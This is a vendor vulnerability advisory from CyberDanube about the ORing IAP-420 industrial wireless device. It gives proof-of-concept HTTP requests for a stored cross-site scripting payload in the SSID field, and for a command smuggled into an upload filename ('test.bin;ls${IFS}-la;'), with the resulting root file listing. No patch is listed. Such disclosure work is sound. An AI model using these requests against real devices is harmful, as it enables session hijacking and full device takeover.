ORing IAP-420 2.01e Cross Site Scripting / Command Injection

CyberDanube Security Research 20240528-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| ORing IAP-420   vulnerable version| 2.01e        fixed version| -           CVE number| CVE-2024-5410, CVE-2024-5411               impact| High             homepage| https://oringnet.com/                found| 2024-01-19                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Founded in 2005, ORing specializes in developing innovative own-brandedproducts for industrial settings. Over the years, ORing has accumulatedabundant experience in wired and wireless network communications industry. Inline with the commercialization of 5G, ORing has stretched its arm into theIIoT field, helping customers realize all kinds of IIoT applications such assmart manufacturing, smart city, and industrial automation. With high productquality and best customer services in mind, ORing has continued to launchcutting-edge products catering to customer needs. ORing's products have beenwidely adopted in surveillance, rail transport, industrial automation, powersubstations, renewable energy, and marine industries with offices worldwide toaddress customer needs in real time."Source: https://oringnet.com/en/about-us/company-profileVulnerable versions-------------------------------------------------------------------------------IAP-420 / 2.01eVulnerability overview-------------------------------------------------------------------------------1) Stored Cross-Site Scripting (CVE-2024-5410)A Stored Cross-Site Scripting vulnerability was identified in the web interfaceof the device. The SSID of the WiFi can be configured to contain arbitraryJavaScript code. An attacker can exploit this vulnerability by luring a victimto visit a malicious website. Furthermore, it is possible to hijack the sessionof the attacked user.2) Authenticated Command Injection (CVE-2024-5411)The filename parameter of the config file upload is prone to a CommandInjection vulnerability. This vulnerability can only be exploited if a user isauthenticated to the web interface. This way, an attacker can invoke commandsand is able to get full control over the whole device.Proof of Concept-------------------------------------------------------------------------------1) Stored Cross-Site Scripting (CVE-2024-5410)Stored Cross-Site Scripting can be triggered by placing JavaScript code intothe SSID input field of the web interface as authenticated user. A singlerequest for injecting the script is shown below:-------------------------------------------------------------------------------POST /cgi-bin/wl_set.cgi HTTP/1.1Host: 192.168.0.1Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 659Connection: keep-aliveCookie: auth=YWRtaW46YWRtaW4=Upgrade-Insecure-Requests: 1sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&wep_key_index=0&ret_msg=-------------------------------------------------------------------------------2) Authenticated Command Injection (CVE-2024-5411)A command can be injected in the filename of the uploaded config. By sending arequest as shown below, the content of the current directory can be shown:-------------------------------------------------------------------------------POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1Host: 10.69.10.2User-Agent: Mozilla/5.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------347087158737672164432057801583Content-Length: 563Connection: keep-aliveCookie: auth=YWRtaW46YWRtaW4=Upgrade-Insecure-Requests: 1-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="upfile"; filename="test.bin;ls${IFS}-la;"-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="bt_upconf"Upload-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="lang"en-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="ret_msg_upconf"-----------------------------347087158737672164432057801583---------------------------------------------------------------------------------This request is equal to executing "ls -la" on the console of the device.-------------------------------------------------------------------------------HTTP/1.0 200 OKtar: can't open '/tmp/test.bin': No such file or directorydrwxr-xr-x    4 root     root         1024 Mar  7 14:36 .drwxr-xr-x    8 root     root         1024 Jan 30  2024 ..-rwxr-xr-x    1 root     root        17572 Jan 30  2024 admin_config.cgi-rwxr-xr-x    1 root     root        17584 Jan 30  2024 admin_default.cgi-rwxr-xr-x    1 root     root        15984 Jan 30  2024 admin_fwup.cgi-rwxr-xr-x    1 root     root        12476 Jan 30  2024 admin_password.cgi-rwxr-xr-x    1 root     root        13164 Jan 30  2024 admin_restart.cgi-rwxr-xr-x    1 root     root        33336 Jan 30  2024 adv_filters.cgi-rwxr-xr-x    1 root     root        15032 Jan 30  2024 adv_misc.cgi-rwxr-xr-x    1 root     root        72168 Jan 30  2024 adv_rstp.cgi-rwxr-xr-x    1 root     root         6588 Jan 30  2024 backup_unit.cgi[...]-------------------------------------------------------------------------------The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------NoneWorkaround-------------------------------------------------------------------------------NoneRecommendation-------------------------------------------------------------------------------CyberDanube recommends Oring customers to upgrade the firmware to the latestversion available and to restrict network access to the management interface ofthe device.Contact Timeline-------------------------------------------------------------------------------2024-02-06: Contacting ORing via [email protected]. Automatic holiday reply.2024-02-19: Asking for an update. No reply.2024-02-28: Asking for an update. No reply.2024-03-11: Searched for "cyber security manager" on LinkedIn. Contacted him            and got the answer, that the content should be sent to            "[email protected]". Sent the advisory to this address directly.2024-03-20: Asking for an update. No reply.2024-04-10: Asking for an update. No reply.2024-04-30: Including [email protected]. Asking for an update. Added            notification about responsible disclosure deadline. No reply.2024-05-02: Including [email protected]. Asking for an update. Added            notification about responsible disclosure deadline. No reply.2024-05-27: Sent information that the advisory will be published on 2024-05-28.2024-05-28: Public release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2024